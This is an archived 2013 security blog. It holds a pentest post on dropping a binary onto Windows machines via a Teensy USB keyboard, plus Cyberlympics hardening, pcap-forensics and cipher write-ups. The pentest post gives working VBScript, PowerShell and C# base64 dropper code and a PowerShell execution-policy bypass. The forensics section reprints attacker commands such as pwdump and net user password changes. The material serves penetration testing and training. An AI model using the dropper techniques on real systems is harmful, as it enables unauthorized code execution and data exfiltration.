Wednesday, July 31, 2013

One year

Yeeeay! :) I have started this blog exactly a year ago! Wow :)

It's hard to find the time to write posts, right now I have around a dozen drafts but looking at the blog statistics and the more and more comments You guys write, I really feel even more motivated to write interesting stuff for You, dear readers :)

So thanks for reading, thx for commenting and stay tuned for more security posts coming up soon!

Tuesday, July 30, 2013

Binary deployment with VBScript, PowerShell or .Net csc.exe compiler

Preface

About six months ago I had an engagement where my task was to exfiltrate data from a workstation on some sort of storage media. Given that I already knew about such techniques for Arduino [1] and Teensy [2], I thought it would be a great opportunity to try them out in real life too.

As a first step I had to bypass a host port protection solution, which was not easy, but I managed to find a way to defeat it. After that, I was good to go to use a Teensy to deploy the exiltrator binary from [2].

And this is where all the troubles have started. In the original blog post [2], the Teensy would type out the exfil.vbs VBScript that has the exiltrator binary in base64 encoded format. But when I tried to execute the VBScript, I got the following error message:

Sript:  C:\...\exfil.vbs
Line:   4
Char:   1
Error:  Error Parsing '<base64_stuff_here>' as bin.base64 datatype.

Code :  80004005
Source: msxml3.dll

It turned out that the Windows XP system where I tried to do the exfiltration was unpatched, having a bug in msxml3.dll which prevented me from converting the base64 encoded payload into binary. :D (seems like there are patches you shouldn't apply...)

But I did not panic, because very thoughtfully, the machine had PowerShell installed (I know, right? :) ), so I re-wrote the VBScript in PowerShell, but I was stupid, and I did not thought (but probably I should have) that PowerShell is using the very same freaking msxml3.dll for base64 decoding...

Still no need to panic, because whenever a Windows box has .Net Framework installed (and I think most of them do have), by default it is shipped with a nice command line compiler called csc.exe so you can write a C# code to convert a base64 payload into binary. :)

Of course, normally you need just one of these methods, but as you can see, sometimes only one of them will work, and it's handy to know each of them.

Binary deployment

VBScript


So the original exfil.vbs script is this:

Dim a,b
Set a=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
a.dataType="bin.base64"
a.text="<PASTE_BASE64_ENCODED_PAYLOAD_HERE>"
Set b=CreateObject("ADODB.Stream")
b.Type=1
b.Open
b.Write a.nodeTypedValue
b.SaveToFile "payload.exe",2

Just execute it, and you will have your payload.exe next to the script.

PowerShell


Second version is in PowerShell:

Add-Type -an System
Add-Type -an System.Windows.Forms 
$e = "<PASTE_BASE64_ENCODED_PAYLOAD_HERE>"
$c = [System.Convert]::FromBase64String($e)
[System.IO.File]::WriteAllBytes("$(get-location)\payload.exe", $c)

To execute the script, you can use any PowerShell script execution restriction bypass method you want. My favorite one is this:

PS C:\temp> gc .\script.ps1 | iex

Where the cmdlets are:
  • gc is Get-Content to read the contents of the PowerShell script
  • iex is Invoke-Expression to execute the script line-by-line (so basically execute the script :) )

.Net C# compiler


Last but not least, you can use csc.exe that is shipped along with .NET Framework.

The following C# needs a text file with the base64 encoded payload in it, but you can modify it to have it in a variable. I got this from a colleague and I was lazy to change it, so I just put the base64 payload into a comment and copied it manually into a file.

You can also make the variable names shorter, so it takes less time for the Teensy to type in, but I think the most time consuming is to type in the base64 payload.

using System;
using System.IO;

// <PASTE_BASE64_ENCODED_PAYLOAD_HERE_AND_PLACE_IT_INTO_payload.txt>

class Base64Decoder
{
   static void Main(string[] args)
   {
      StreamReader reader = new StreamReader(args[0]);
      string line = reader.ReadLine();
      reader.Close();

      byte[] toDecodeByte = Convert.FromBase64String(line);

      FileStream outfileStream = new FileStream(args[1], FileMode.Create);
      outfileStream.Write(toDecodeByte, 0, toDecodeByte.Length);
      outfileStream.Close();
   }
}

Compile it, and convert the payload:

C:\temp>%Systemroot%\Microsoft.NET\Framework\v3.5\csc /out:C:\temp\d64.exe c:\temp\d64.cs
Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.5420
for Microsoft (R) .NET Framework version 3.5
Copyright (C) Microsoft Corporation. All rights reserved.

C:\temp>d64.exe payload.txt payload.exe

And that's all! :) Three easy ways to deploy a binary on a Windows box!

Hardware

I quick update, since I forgot to write about the HW I used. It's plain simple actually, just a Teensy 2.0 with a Teensy SD Adaptor, connected to the PC with an USB A type to USB MINI-B type cable.

Every detail on connecting a Teensy with the SD Adaptor can be found in my "Making a USB flash drive HW Trojan" blog post, but just as a quick recap, here is the picture for the wiring:


References

[1] Leaking data using DIY USB HID device

[2] Data exfiltration using a USB keyboard

Monday, July 29, 2013

Cyberlympics 2013 Round 2 summary and results

Cyberlympics Round 2 is now over :). I think it was a bit less fun than last year, but it was also better this way cause it was more realistic.

European Round 2 results were:

1. SectorC – Netherlands
2. Hack.ERS – Netherlands
3. gula.sh – Hungary
4. nanosloopers - United Kingdom
5. Pruts.ERS – Netherlands
6. PRAUDITORS – Hungary

Congrats to all teams, again, especially to PRAUDITORS! We have 2 Hungarian teams in round 3! :)

I was willing to make a nice write-up this time as well, but since we only saw our current points and made fixes in parallel, sometimes it was not possible to figure out what gave us points and what didn't.

We had one Windows 2003 and a Fedora 16 box and we had to harden those after signing in with the CyberNEXS client.

For the Windows 2003, what we did:

  • Setting password policy
  • Setting audit policy
  • Installing Windows updates
  • Killing listening processes
  • Stopping unnecessary services
  • Getting rid of suspicious programs, like:
    • PHP-shell (http://mgeisler.net/php-shell/): C:\Inetpub\wwwroot\iis\index.php
    • Best Free Keylogger: C:\Program Files\Common Files\Services\Windows Updater\wusched.exe
    • netcat, pwdump:  C:\WINDOWS\dll.zip
    • Netcat:  C:\Inetpub\wwwroot\images\letmein.exe and C:\Documents and Settings\Administrator\Local Settings\Temp\1.exe
    • ??? (we don't know what was it, but looked suspicious):  C:\Documents and Settings\Administrator\Local Settings\Temp\2.exe
    • MSIZAP (not sure) : C:\msizap.exe
    • ProRAT (not sure): C:\Program Files\Mozilla Firefox\firefox.exe

For the Fedora 16:
  • Changing root and toor user password
  • Removing backdoor user (username was bd, or something like that)
  • iptables rules
  • sshd settings
  • sysctl.conf settings
  • rsyslog settings
  • samba settings
  • Disabling vsftp, anonymous ftp, stopping the services
  • Stopping 3rd party irc service (/opt/Unreal3.2, possibly backdoor) and deleting it
  • Removing netcat bakcdoor from rc
  • Disabling telnet 
  • Disabling sudoers nopasswd
  • Setting up a groub password
  • Fixing /etc/shadow* files' world readable/writeable rights
  • Full system upgrade

End results were: 19/20 for WIN2003 and 9/11 for Fedora, so it was quite good. :)

I think I am not telling big news, but every team we have talked tried to reverse engineer some way the CyberNEXS client too :) I guess it's just a normal way of thinking in a hacking competition ;)

Tuesday, July 16, 2013

Cyberlympics 2013 Round 1 write-up and results

I really enjoyed the first hour of this round, since we only got a 22 MB pcap file, and 10 questions, and we had to do a little investigation. But the last 2 hours were miserable. Question 10 was basically 5 challenges, but pretty hard. We only managed to find the solution for 2 and got 1 more from another team, meaning that the best scoring team was only able to solve 3 out of 5...

Srsly, why do we need these challenges? A harder forensics challenge would have been much better... maybe next year. BTW, if you want to practice forensics challenges of pcap files, check out the Honeynet Project Challenges!

Basically we used 3 tools: NetworkMiner free edition, xplico and JPK for the challenges.

Quick write-up of the Round 1 solutions (If you see any missing stuff, please comment or write it to me! Thx!):

QUESTION 1. What files were transferred to/from the victim?

Download:
Source host: 192.168.245.12 [WORKGROUP <1D>[2K3]] (Windows)
Source port: TCP 20
Destination host: 192.168.245.3 [X]
Destination port: TCP 52625
Protocol: FTP
Files:
favicon.ico (frame: 16995, 7002 bytes)
challenges.zip (frame: 17028, 923 bytes)
RPWD.RTF (frame: 17045, 232 bytes)

Upload:
Source host: 192.168.245.3 [X] 
Source port: TCP 52644 (frame 19523), TCP 52872 (frame 26964), TCP 52877 (frame 27204), TCP 52878 (frame 27516), TCP 52879 (frame 27649), TCP 52880 (frame 28109), TCP 52881 (frame 28126), TCP 52882 (frame 28143), TCP 52883 (frame 28161)
Destination host: 192.168.245.12 [WORKGROUP <1D>[2K3]] (Windows)
Destination port: TCP 20
Protocol: FTP
Files:
PwDump7.exe (frame 19523, 77 824 B)
sdb.exe (frame 26964, 139 264 B)
BFK.exe (frame 27204, 274 432 B)
MISINET.OCX (frame 27516, 115 920 B)
convertel.dll (frame 27649, 459 776 B)
inetlog.txt (frame 28109 240 B)
keylog.txt (frame 28126, 2 B) 
needtosend.log (frame 28143, 0 B)
sclog.txt (frame 28161, 0 B)

CMD log:
C:\Documents and Settings\John\Desktop>copy challenges.zip C:\inetpub\ftproot\GMTMP
C:\Documents and Settings\John\My Documents>copy RPWD.RTF C:\inetpub\ftproot\GMTMP
C:\Inetpub\ftproot\GMTMP>net share >> favicon.ico
C:\Inetpub>pwdump7 >> C:\inetpub\ftproot\GMTMP\favicon.ico

QUESTION 2. What malware/unauthorized programs were installed?

BFK.exe
Application.Best_Free_Keylogger

converter.dll
Application.Best_Free_Keylogger

sbd.exe
Secure_BackDoor (crypted netcat)

PwDump7.exe
Trojan.Pwdump

MSINET.OCX
Win32.Flooder.IM.VB

QUESTION 3. What directory were files transferred to or from?

C:\Documents and Settings\John\Desktop
C:\Documents and Settings\John\My Documents
C:\inetpub\ftproot\GMTMP - DONE
C:\Inetpub

QUESTION 4. What is MD5 hash of files transferred from the web server? (Use lowercase letters)

favicon.ico (frame: 16995, 7002 bytes) - 993a36908782cb531c5e6f9f40c3102d
challenges.zip (frame: 17028, 923 bytes) - 0492a385f6db8a947f3434e2683e8353
RPWD.RTF (frame: 17045, 232 bytes) - 0ecc217d8cff2fdc366450e56a92282c

QUESTION 5. What is the router password?

It was in the file RPWD.RTF that we extracted from the pcap file. Once opened, the following content was found: “password 7 0139562C753F2E5C067E16”. The hash “0139562C753F2E5C067E16” was cracked, the plain text password was: “J0HNTH3GR8”

QUESTION 6. What was the admin doing during attack?

This was kinda' strange, because we was a lot of site addresses, but we only got point for amazon.com ...

QUESTION 7. What were user passwords changed to?

The following commands were issued:

C:\>net user administrator GMODEOWNZYOU
C:\>net user John GMODEOWNZYOU
C:\>net user nonadmin GMODEOWNZYOU

QUESTION 8. Were there any suspicious users on the machine?

List of users:

Administrator
ASPNET
badmin
Guest
IUSR_ADMIN-1DL53VWF1  
John
nonadmin
SUPPORT_388945a0
WMUS_ADMIN-1DL53VWF1

And user "badmin" was the answer.

QUESTION 9. What file did the attacker hide info in that he later extracted?

See QUESTION 1.

QUESTION 10. What do the secret messages decode to?

The challenges.zip file had 5 .txt files:

1.txt

This was NOT real morse code, it had to be converted into binary (- is 0 and . is 1), then onvert binary to ACSII, then you have a Base64 encoded text, and if you decode that, you will get:

THEOBSCUREWESEEEVENTUALLYTHECOMPLETELYOBVIOUSITSEEMSTAKESLONGER

2.txt

No clue, if you got this, pls comment or send it to me! Thx!

3.txt

You need to pick up every 3rd letter, starting with T, and you will get:

THEONLYWAYTOGROWISTOCHALLENGEYOURSELF

4.txt

So we were not able to solve this, but big thanks to santrancisco (see comments), I know now that the solution was Railfence cypher with Rails = 8.

A nice Railfence online solver is here: http://rumkin.com/tools/cipher/railfence.php

Solution:

R.............I.............N.............I..
.E...........T.M...........O.T...........O.N.
..S.........A...D.........D...K.........D...G
...E.......H.....O.......I.....N.......M.....
....A.....W.......I.....N.......O.....I......
.....R...S.........N...E.........W...T.......
......C.I...........G.H...........W.A........
.......H.............W.............H.........

So it reads to: RESEARCHISWHATIMDOINGWHENIDONTKNOWWHATIMDOING

5.txt

So, you start getting you hexa from the lower left corner, reading upwards and basically converting the columns into lines and then convert hex to text, and you will have:

MYWORKISUTTERLYINCOMPREHENSIBLEANDISTHEREFOREFULLOFDEEPSIGNIFICANCE

Aaand that's all! :)

The top 10 teams moving on to Round 2 to represent Europe are:

1. Hack.ERS - Netherlands
1. Pruts.ERS - Netherlands
2. nanosloopers - United Kingdom
2. nx - Finland
3. gula.sh - Hungary
4. 0xD0A - United Kingdom
4. SectorC - Netherlands
5. Blah - Czech Republic
6. mici-cu-b3re - Romania
7. PRAUDITORS - Hungary

Congrats to all teams, specially to PRAUDITORS! We have 2 Hungarian teams again in round 2! :)

Monday, July 15, 2013

Cyberlympics 2013 Practice Round 1 write-up

Team gula.sh is participating in the Global Cyberlympics 2013 games, and we have been doing a little practicing before the first round.

Although we missed the practice rounds (I didn't get any e-mails, some of my teammates did...), thanks to my friend Hari from the Indian *.* null team, we obtained the practice round challenge package and played with it a little.

A very quick write-up on the challenges:

DECODE_ME01.txt
Base64 encoded.
Solution: WELCOME TO THE JUNGLE, WE HAVE FUN AND GAMES, SOME OF THEM ARE EVEN STAEJRWU.

DECODE_ME02.txt
Reversed String.
Solution: THIS OLD MAN, HE HAD FUN, HE PLAYED BOUTDTMS ON MY THUMB.

DECODE_ME03.txt
Digraph (a pair of characters used to write one).
Solution: sometimes the older ways are the better ways, this eimwetot is not one of them.

DECODE_ME04.txt
It was a text in hex.
Solution: I ONCE TRIED TO COUNT IN HEXADECIMAL BUT I KEPT LOOSING COUNT AFTER XUNEFILM.

DECODE_ME05.txt
Morse code.
Solution: BEEPBOOPBEEPSOUNDSLIKER2D2ISHAVINGAFITMAYBEITISBECAUSEIEIBSMSCMADEHIM

DECODE_ME06.txt
It was a text in binary.
Solution: IF YOU ADD UP ALL THE ONES IN THIS MESSAGE IT SPELLS SNFNLEGI IN EBCDIC.

DECODE_ME07.txt
URL Encoded.
Solution: TOO MANY TIMES I LOOK INTO THE FACE OF OBEMTGOE AND REALIZE THAT I AM STARING BACK AT MYSELF.

DECRYPT_ME01.txt
Caesar cipher.
Solution: IF YOU KEEP DECRYPTING ME LIKE THAT I THINK I AM GOING TO YGTRIPLO ALL OVER THE PLACE!

DECRYPT_ME02.txt
Caesar cipher.
Solution: THERE ONCE WAS A MAN FROM NANTUCKET. WHOSE NAFCMHUE WAS SO LONG, HE COULD… KEEP YOUR MIND CLEAN!!!!

DECRYPT_ME03.txt
Caesar cipher again...
Solution: IF YOU KNEW JULIUS LIKE I KNEW NADNEJUE THEN WE WOULD NOT NEED A CASEAR CIPER AT ALL.

DECRYPT_ME04.txt
Substitution cipher.
Solution: there is something evil in the way a random substitution works, it makes kewmtyat look normal.

DECRYPT_ME05.txt
Couldn't find the solution for this one in 10 mins, so we skipped it. Anyone having the solution for this, please comment, or send it to me. Thx!

FILECARVE_ME01.zip
It was a JPEG file of a QR code.
Solution:
The order of the chunks: 7862_8200_9525_1556_5490_5706_7466_7251_1055_6218_5220
QR code raw bytes: 40 85 65 54 65 24 54 35 24 10 ec 11 ec 11 ec 11 ec 11 ec 
QR code raw text: VUFRECRA

FILECARVE_ME02.zip
2 JPEG files, one was a cute bunny, the other one was a QR code again.
Solution:
Chunk order for the bunny: 4192_9117_7715_4081_2994_6501_4927_3182_4957
Chunk order for the QR code: 4901_3326_4603_1700_2737_6576_6823_5471_9316_1186_4805
QR code raw bytes: 40 95 14 15 85 54 24 14 e5 50 a0 ec 11 ec 11 ec 11 ec 11 
QR code raw text: QAXUBANU

FILECARVE_ME03.zip
I was too lazy to solve this one. It's a zip file, with a JPEG file named FILECARVE_ME03.JPG within. Again, if you have the solution, please comment, or send it to me. Thx!
Solution:
Thanks to Uuganjargal Amarsaikhan, The order of the chunks for this one is:
2143_0642_5467_5354_5149_0291_5335_7886_9524_4489_7997_4970_7077_6059_0284_7195_0794_6232_1519_7873_6639_7656_8091_0584_7866_3845_7804_2193_9518_7702
QR code raw bytes: 40 95 95 55 05 24 55 34 54 e0 a0 ec 11 ec 11 ec 11 ec 11
QR code raw text: YUPRESEN

FILECARVE_ME04.zip
I was too lazy to solve this one too. It's an mp3 file, and I think it's morse code. Once again, if you have the solution, please comment, or send it to me. Thx!
Solution:
Again, thanks to Uuganjargal Amarsaikhan, the order of the chunks for this one is: 1899_3173_4732_4730_2453_7774_4131_6350_2981_0379
Morse text in the MP3 file: CHUCAPHU